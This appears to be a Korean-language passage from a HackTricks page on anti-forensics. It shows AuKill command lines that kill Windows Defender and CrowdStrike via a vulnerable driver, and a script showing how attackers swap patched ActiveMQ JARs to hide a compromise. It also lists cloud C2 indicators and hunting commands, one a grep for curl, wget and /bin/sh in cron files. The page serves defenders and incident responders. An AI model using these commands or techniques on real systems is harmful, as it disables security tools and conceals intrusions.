์ŠคํŠธ๋ฆผ์„ ๋‚˜์—ดํ•˜๋ ค๋ฉด dir /R, Get-Item -Stream * ๋˜๋Š” Sysinternals streams64.exe๋ฅผ ์‚ฌ์šฉํ•˜์‹ญ์‹œ์˜ค. ํ˜ธ์ŠคํŠธ ํŒŒ์ผ์„ FAT/exFAT๋กœ ๋ณต์‚ฌํ•˜๊ฑฐ๋‚˜ SMB๋ฅผ ํ†ตํ•ด ๋ณต์‚ฌํ•˜๋ฉด ์ˆจ๊ฒจ์ง„ ์ŠคํŠธ๋ฆผ์ด ์ œ๊ฑฐ๋˜๋ฉฐ, ์ด๋Š” ์กฐ์‚ฌ์ž๊ฐ€ ํŽ˜์ด๋กœ๋“œ๋ฅผ ๋ณต๊ตฌํ•˜๋Š” ๋ฐ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

BYOVD & โ€œAuKillโ€ (2023)

Bring-Your-Own-Vulnerable-Driver๋Š” ์ด์ œ ๋žœ์„ฌ์›จ์–ด ์นจ์ž…์—์„œ ์•ˆํ‹ฐ ํฌ๋ Œ์‹์„ ์œ„ํ•ด ์ •๊ธฐ์ ์œผ๋กœ ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ์˜คํ”ˆ ์†Œ์Šค ๋„๊ตฌ AuKill์€ ์„œ๋ช…๋œ ๊ทธ๋Ÿฌ๋‚˜ ์ทจ์•ฝํ•œ ๋“œ๋ผ์ด๋ฒ„(procexp152.sys)๋ฅผ ๋กœ๋“œํ•˜์—ฌ ์•”ํ˜ธํ™” ๋ฐ ๋กœ๊ทธ ํŒŒ๊ดด ์ „์— EDR ๋ฐ ํฌ๋ Œ์‹ ์„ผ์„œ๋ฅผ ์ผ์‹œ ์ค‘์ง€ํ•˜๊ฑฐ๋‚˜ ์ข…๋ฃŒํ•ฉ๋‹ˆ๋‹ค:

AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
AuKill.exe -k CrowdStrike

๋“œ๋ผ์ด๋ฒ„๋Š” ์ดํ›„ ์ œ๊ฑฐ๋˜์–ด ์ตœ์†Œํ•œ์˜ ์•„ํ‹ฐํŒฉํŠธ๋ฅผ ๋‚จ๊น๋‹ˆ๋‹ค.
์™„ํ™” ์กฐ์น˜: Microsoft ์ทจ์•ฝํ•œ ๋“œ๋ผ์ด๋ฒ„ ์ฐจ๋‹จ ๋ชฉ๋ก(HVCI/SAC)์„ ํ™œ์„ฑํ™”ํ•˜๊ณ , ์‚ฌ์šฉ์ž ์“ฐ๊ธฐ ๊ฐ€๋Šฅํ•œ ๊ฒฝ๋กœ์—์„œ ์ปค๋„ ์„œ๋น„์Šค ์ƒ์„ฑ์— ๋Œ€ํ•ด ๊ฒฝ๊ณ ํ•ฉ๋‹ˆ๋‹ค.


๋ฆฌ๋ˆ…์Šค ์•ˆํ‹ฐ ํฌ๋ Œ์‹: ์ž๊ธฐ ํŒจ์น˜ ๋ฐ ํด๋ผ์šฐ๋“œ C2 (2023โ€“2025)

ํƒ์ง€๋ฅผ ์ค„์ด๊ธฐ ์œ„ํ•œ ์ž๊ธฐ ํŒจ์น˜๋œ ์†์ƒ๋œ ์„œ๋น„์Šค (๋ฆฌ๋ˆ…์Šค)

์ ๋Œ€์ž๋“ค์€ ์žฌ์นจํˆฌ๋ฅผ ๋ฐฉ์ง€ํ•˜๊ณ  ์ทจ์•ฝ์„ฑ ๊ธฐ๋ฐ˜ ํƒ์ง€๋ฅผ ์–ต์ œํ•˜๊ธฐ ์œ„ํ•ด ์„œ๋น„์Šค๋ฅผ ์•…์šฉํ•œ ์งํ›„ โ€œ์ž๊ธฐ ํŒจ์น˜โ€œํ•˜๋Š” ๊ฒฝํ–ฅ์ด ์ฆ๊ฐ€ํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„์ด๋””์–ด๋Š” ์ทจ์•ฝํ•œ ๊ตฌ์„ฑ ์š”์†Œ๋ฅผ ์ตœ์‹ ์˜ ํ•ฉ๋ฒ•์ ์ธ ์—…์ŠคํŠธ๋ฆผ ๋ฐ”์ด๋„ˆ๋ฆฌ/JAR๋กœ ๊ต์ฒดํ•˜์—ฌ ์Šค์บ๋„ˆ๊ฐ€ ํ˜ธ์ŠคํŠธ๋ฅผ ํŒจ์น˜๋œ ๊ฒƒ์œผ๋กœ ๋ณด๊ณ ํ•˜๋„๋ก ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด๋•Œ ์ง€์†์„ฑ๊ณผ C2๋Š” ์œ ์ง€๋ฉ๋‹ˆ๋‹ค.

์˜ˆ์‹œ: Apache ActiveMQ OpenWire RCE (CVEโ€‘2023โ€‘46604)

  • ํฌ์ŠคํŠธ ์ต์Šคํ”Œ๋กœ์ž‡ ํ›„, ๊ณต๊ฒฉ์ž๋“ค์€ Maven Central (repo1.maven.org)์—์„œ ํ•ฉ๋ฒ•์ ์ธ JAR๋ฅผ ๊ฐ€์ ธ์˜ค๊ณ , ActiveMQ ์„ค์น˜์—์„œ ์ทจ์•ฝํ•œ JAR๋ฅผ ์‚ญ์ œํ•œ ํ›„ ๋ธŒ๋กœ์ปค๋ฅผ ์žฌ์‹œ์ž‘ํ–ˆ์Šต๋‹ˆ๋‹ค.
  • ์ด๋Š” ์ดˆ๊ธฐ RCE๋ฅผ ์ฐจ๋‹จํ•˜๋ฉด์„œ ๋‹ค๋ฅธ ๋ฐœํŒ(ํฌ๋ก , SSH ๊ตฌ์„ฑ ๋ณ€๊ฒฝ, ๋ณ„๋„์˜ C2 ์ž„ํ”Œ๋ž€ํŠธ)์„ ์œ ์ง€ํ–ˆ์Šต๋‹ˆ๋‹ค.

์šด์˜ ์˜ˆ์‹œ (์„ค๋ช…์šฉ)

# ActiveMQ install root (adjust as needed)
AMQ_DIR=/opt/activemq
cd "$AMQ_DIR"/lib

# Fetch patched JARs from Maven Central (versions as appropriate)
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-client/5.18.3/activemq-client-5.18.3.jar
curl -fsSL -O https://repo1.maven.org/maven2/org/apache/activemq/activemq-openwire-legacy/5.18.3/activemq-openwire-legacy-5.18.3.jar

# Remove vulnerable files and ensure the service uses the patched ones
rm -f activemq-client-5.18.2.jar activemq-openwire-legacy-5.18.2.jar || true
ln -sf activemq-client-5.18.3.jar activemq-client.jar
ln -sf activemq-openwire-legacy-5.18.3.jar activemq-openwire-legacy.jar

# Apply changes without removing persistence
systemctl restart activemq || service activemq restart

Forensic/hunting tips

  • ์„œ๋น„์Šค ๋””๋ ‰ํ† ๋ฆฌ์—์„œ ์˜ˆ์ •๋˜์ง€ ์•Š์€ ๋ฐ”์ด๋„ˆ๋ฆฌ/JAR ๊ต์ฒด๋ฅผ ๊ฒ€ํ† ํ•ฉ๋‹ˆ๋‹ค:
  • Debian/Ubuntu: dpkg -V activemq๋ฅผ ์‚ฌ์šฉํ•˜๊ณ  ํŒŒ์ผ ํ•ด์‹œ/๊ฒฝ๋กœ๋ฅผ ์ €์žฅ์†Œ ๋ฏธ๋Ÿฌ์™€ ๋น„๊ตํ•ฉ๋‹ˆ๋‹ค.
  • RHEL/CentOS: rpm -Va 'activemq*'
  • ํŒจํ‚ค์ง€ ๊ด€๋ฆฌ์ž๊ฐ€ ์†Œ์œ ํ•˜์ง€ ์•Š๋Š” ๋””์Šคํฌ์— ์žˆ๋Š” JAR ๋ฒ„์ „์ด๋‚˜ ๋น„์ •์ƒ์ ์œผ๋กœ ์—…๋ฐ์ดํŠธ๋œ ์‹ฌ๋ณผ๋ฆญ ๋งํฌ๋ฅผ ์ฐพ์Šต๋‹ˆ๋‹ค.
  • ํƒ€์ž„๋ผ์ธ: find "$AMQ_DIR" -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n' | sort๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ctime/mtime๊ณผ ํƒ€ํ˜‘ ์ฐฝ์„ ์—ฐ๊ด€์‹œํ‚ต๋‹ˆ๋‹ค.
  • ์…ธ ๊ธฐ๋ก/ํ”„๋กœ์„ธ์Šค ํ…”๋ ˆ๋ฉ”ํŠธ๋ฆฌ: ์ดˆ๊ธฐ ์•…์šฉ ์งํ›„ curl/wget์˜ repo1.maven.org ๋˜๋Š” ๋‹ค๋ฅธ ์•„ํ‹ฐํŒฉํŠธ CDN์— ๋Œ€ํ•œ ์ฆ๊ฑฐ.
  • ๋ณ€๊ฒฝ ๊ด€๋ฆฌ: โ€œํŒจ์น˜โ€๋ฅผ ์ ์šฉํ•œ ์‚ฌ๋žŒ๊ณผ ๊ทธ ์ด์œ ๋ฅผ ๊ฒ€์ฆํ•˜๋ฉฐ, ํŒจ์น˜๋œ ๋ฒ„์ „์ด ์กด์žฌํ•˜๋Š” ๊ฒƒ๋งŒ ํ™•์ธํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

Cloudโ€‘service C2 with bearer tokens and antiโ€‘analysis stagers

๊ด€์ฐฐ๋œ ๋ฌด์—ญ ๊ธฐ์ˆ ์€ ์—ฌ๋Ÿฌ ์žฅ๊ธฐ C2 ๊ฒฝ๋กœ์™€ ๋ฐ˜๋ถ„์„ ํŒจํ‚ค์ง•์„ ๊ฒฐํ•ฉํ–ˆ์Šต๋‹ˆ๋‹ค:

  • ์ƒŒ๋“œ๋ฐ•์‹ฑ ๋ฐ ์ •์  ๋ถ„์„์„ ๋ฐฉํ•ดํ•˜๊ธฐ ์œ„ํ•œ ๋น„๋ฐ€๋ฒˆํ˜ธ ๋ณดํ˜ธ๋œ PyInstaller ELF ๋กœ๋” (์˜ˆ: ์•”ํ˜ธํ™”๋œ PYZ, /_MEI* ์•„๋ž˜์˜ ์ž„์‹œ ์ถ”์ถœ).
  • ์ง€ํ‘œ: strings ํžˆํŠธ ์˜ˆ: PyInstaller, pyi-archive, PYZ-00.pyz, MEIPASS.
  • ๋Ÿฐํƒ€์ž„ ์•„ํ‹ฐํŒฉํŠธ: /tmp/_MEI* ๋˜๋Š” ์‚ฌ์šฉ์ž ์ •์˜ --runtime-tmpdir ๊ฒฝ๋กœ๋กœ์˜ ์ถ”์ถœ.
  • ํ•˜๋“œ์ฝ”๋”ฉ๋œ OAuth Bearer ํ† ํฐ์„ ์‚ฌ์šฉํ•˜๋Š” Dropbox ์ง€์› C2
  • ๋„คํŠธ์›Œํฌ ๋งˆ์ปค: api.dropboxapi.com / content.dropboxapi.com์—์„œ Authorization: Bearer <token>.
  • ์„œ๋ฒ„ ์ž‘์—… ๋ถ€ํ•˜์—์„œ ํŒŒ์ผ์„ ์ •์ƒ์ ์œผ๋กœ ๋™๊ธฐํ™”ํ•˜์ง€ ์•Š๋Š” Dropbox ๋„๋ฉ”์ธ์œผ๋กœ์˜ ์•„์›ƒ๋ฐ”์šด๋“œ HTTPS๋ฅผ ์œ„ํ•ด ํ”„๋ก์‹œ/NetFlow/Zeek/Suricata์—์„œ ์ˆ˜์ƒ‰ํ•ฉ๋‹ˆ๋‹ค.
  • ์ฑ„๋„์ด ์ฐจ๋‹จ๋  ๊ฒฝ์šฐ ์ œ์–ด๋ฅผ ์œ ์ง€ํ•˜๋Š” ํ„ฐ๋„๋ง์„ ํ†ตํ•œ ๋ณ‘๋ ฌ/๋ฐฑ์—… C2 (์˜ˆ: Cloudflare Tunnel cloudflared).
  • ํ˜ธ์ŠคํŠธ IOC: cloudflared ํ”„๋กœ์„ธ์Šค/์œ ๋‹›, ~/.cloudflared/*.json์˜ ๊ตฌ์„ฑ, Cloudflare ์—ฃ์ง€๋กœ์˜ ์•„์›ƒ๋ฐ”์šด๋“œ 443.

Persistence and โ€œhardening rollbackโ€ to maintain access (Linux examples)

๊ณต๊ฒฉ์ž๋Š” ์ž์ฃผ ์ž๊ฐ€ ํŒจ์น˜์™€ ๋‚ด๊ตฌ์„ฑ ์žˆ๋Š” ์ ‘๊ทผ ๊ฒฝ๋กœ๋ฅผ ์Œ์œผ๋กœ ์‚ฌ์šฉํ•ฉ๋‹ˆ๋‹ค:

  • Cron/Anacron: ๊ฐ /etc/cron.*/ ๋””๋ ‰ํ† ๋ฆฌ์˜ 0anacron ์Šคํ…์„ ํŽธ์ง‘ํ•˜์—ฌ ์ฃผ๊ธฐ์ ์œผ๋กœ ์‹คํ–‰ํ•ฉ๋‹ˆ๋‹ค.
  • ์ˆ˜์ƒ‰:
for d in /etc/cron.*; do [ -f "$d/0anacron" ] && stat -c '%n %y %s' "$d/0anacron"; done
grep -R --line-number -E 'curl|wget|python|/bin/sh' /etc/cron.*/* 2>/dev/null
  • SSH ๊ตฌ์„ฑ ํ•˜๋“œ๋‹ ๋กค๋ฐฑ: ๋ฃจํŠธ ๋กœ๊ทธ์ธ์„ ํ™œ์„ฑํ™”ํ•˜๊ณ  ์ €๊ถŒํ•œ ๊ณ„์ •์˜ ๊ธฐ๋ณธ ์…ธ์„ ๋ณ€๊ฒฝํ•ฉ๋‹ˆ๋‹ค.
  • ๋ฃจํŠธ ๋กœ๊ทธ์ธ ํ™œ์„ฑํ™”๋ฅผ ์ˆ˜์ƒ‰ํ•ฉ๋‹ˆ๋‹ค:
grep -E '^\s*PermitRootLogin' /etc/ssh/sshd_config
# "yes"์™€ ๊ฐ™์€ ํ”Œ๋ž˜๊ทธ ๊ฐ’ ๋˜๋Š” ์ง€๋‚˜์น˜๊ฒŒ ๊ด€๋Œ€ํ•œ ์„ค์ •
  • ์‹œ์Šคํ…œ ๊ณ„์ •์—์„œ ์˜์‹ฌ์Šค๋Ÿฌ์šด ๋Œ€ํ™”ํ˜• ์…ธ์„ ์ˆ˜์ƒ‰ํ•ฉ๋‹ˆ๋‹ค (์˜ˆ: games):
awk -F: '($7 ~ /bin\/(sh|bash|zsh)/ && $1 ~ /^(games|lp|sync|shutdown|halt|mail|operator)$/) {print}' /etc/passwd
  • ํด๋ผ์šฐ๋“œ C2์™€๋„ ์ ‘์ด‰ํ•˜๋Š” ๋žœ๋ค, ์งง์€ ์ด๋ฆ„์˜ ๋น„์ฝ˜ ์•„ํ‹ฐํŒฉํŠธ (8๊ฐœ์˜ ์•ŒํŒŒ๋ฒณ ๋ฌธ์ž)๊ฐ€ ๋””์Šคํฌ์— ๋“œ๋กญ๋ฉ๋‹ˆ๋‹ค:
  • ์ˆ˜์ƒ‰:
find / -maxdepth 3 -type f -regextype posix-extended -regex '.*/[A-Za-z]{8}$' \
-exec stat -c '%n %s %y' {} \; 2>/dev/null | sort

์ˆ˜๋น„์ž๋Š” ์ด๋Ÿฌํ•œ ์•„ํ‹ฐํŒฉํŠธ๋ฅผ ์™ธ๋ถ€ ๋…ธ์ถœ ๋ฐ ์„œ๋น„์Šค ํŒจ์น˜ ์ด๋ฒคํŠธ์™€ ์—ฐ๊ด€์‹œ์ผœ ์ดˆ๊ธฐ ์•…์šฉ์„ ์ˆจ๊ธฐ๊ธฐ ์œ„ํ•ด ์‚ฌ์šฉ๋œ ๋ฐ˜ํฌ๋ Œ์‹ ์ž๊ฐ€ ๋ณต๊ตฌ๋ฅผ ๋ฐํ˜€๋‚ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

References

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ